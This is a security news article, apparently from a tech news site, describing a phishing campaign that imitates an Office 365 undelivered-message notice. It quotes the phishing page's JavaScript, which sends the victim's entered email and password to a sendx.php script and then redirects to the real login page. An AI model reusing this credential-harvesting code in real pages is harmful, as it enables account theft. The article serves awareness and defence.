Connect with us

Hacker News

New Phishing Attack Targets Office 365 Users

Hacker News Malware

Emotet Malware Makes a Comeback with Fresh Attacks After Three Months of Silence

Hacker News Vulnerability

Lazarus Group Found Exploiting Zero-Day Vulnerabilities in Latest Cyber Attack

Hacker News

Chinese hackers develop new custom backdoor to evade detection

Hacker News

Hackers are exploiting vulnerabilities in containerized environments

Hacker News

Play Ransomware Group Brags About Disruptive Attack on City of Oakland

Hacker News

Chinese State-Sponsored Hacking Group APT31 Targets European Organizations

Hacker News Vulnerability

Researchers Uncover New Security Vulnerabilities in TPM 2.0 Library

Data Breaches Hacker News

Dark Web Marketplace Bidencash Leaks 2 Million Stolen Credit Cards for Free

Hacker News

White Hat Hacking Does Pay: Pwn2Own Shells Out 980,000 in Rewards

Hacker News

New Phishing Attack Targets Office 365 Users

Published

5 years ago

on

New Phishing Attack Targets Office 365 Users

Phishing scams are continuing to plague the emails of people around the world, and this week a new one was discovered. The new phishing campaign pretends to be a non-delivery notification from Office 365, that encourages users to enter their login information into a page with the aim of stealing username and password data.

ISC Handler Xavier Mertens discovered the phishing scam and released its details on Thursday 13 December. The email, masquerading as Microsoft states “Microsoft found Several Undelivered Messages”, telling the user that their message couldn’t be delivered. It then includes a “How to Fix it” section which states:

“if you’re using Outlook, open this non-delivery report message and click Send Again.”

When the victim clicks on the “Send Again” link located in the phishing email, they will be routed to a phishing site that masquerades as the Office 365 login screen. The site also has a feature that auto-populate the email address field, using the victim’s email address, which adds to the legitimacy of the site. The user is encouraged to enter their password to resend the emails. When a user does enter their password, a JavaScript function called sendmails() will send the login details to the sendx.php script

function sendmails() {
  var em = $('#testx').val();
  var ps = $('#pass').val();
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      var response = JSON.parse(this.responseText);
      if (response.msg == "donesend") {
        $(".login_form").hide(); 
        $(".thanks").show(); setTimeout("window.location.href='https://outlook.office365.com/owa/?realm';",5000);
      } else {
        $("#warning").empty();
        $('#warning').append('Your email or password is incorrect. If you don\'t remember your password,<a href="#"> reset it now.<a/>');
      }
    }
  };
  xhttp.open("GET", "sendx.php?user=" + em + "&pass=" +ps, true);
  xhttp.send();
}

 

and then redirect the user to the legitimate Office 365 login screen.

 

The website the attackers link to in their email, makings a convincing attempt to mirror the legitimate Office 365 website. Phishing campaigns like these are becoming increasingly sophisticated and it is becoming increasingly difficult for the average computer user to tell the difference, leading many people to fall victim to sharing their credentials. We encourage users to check the URL and not proceed if anything looks suspicious. Going further, it would be preferential for users to go directly to the correct URL without following the link provided in emails.

Related Topics:

Experienced British technology journalist and online reporter

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *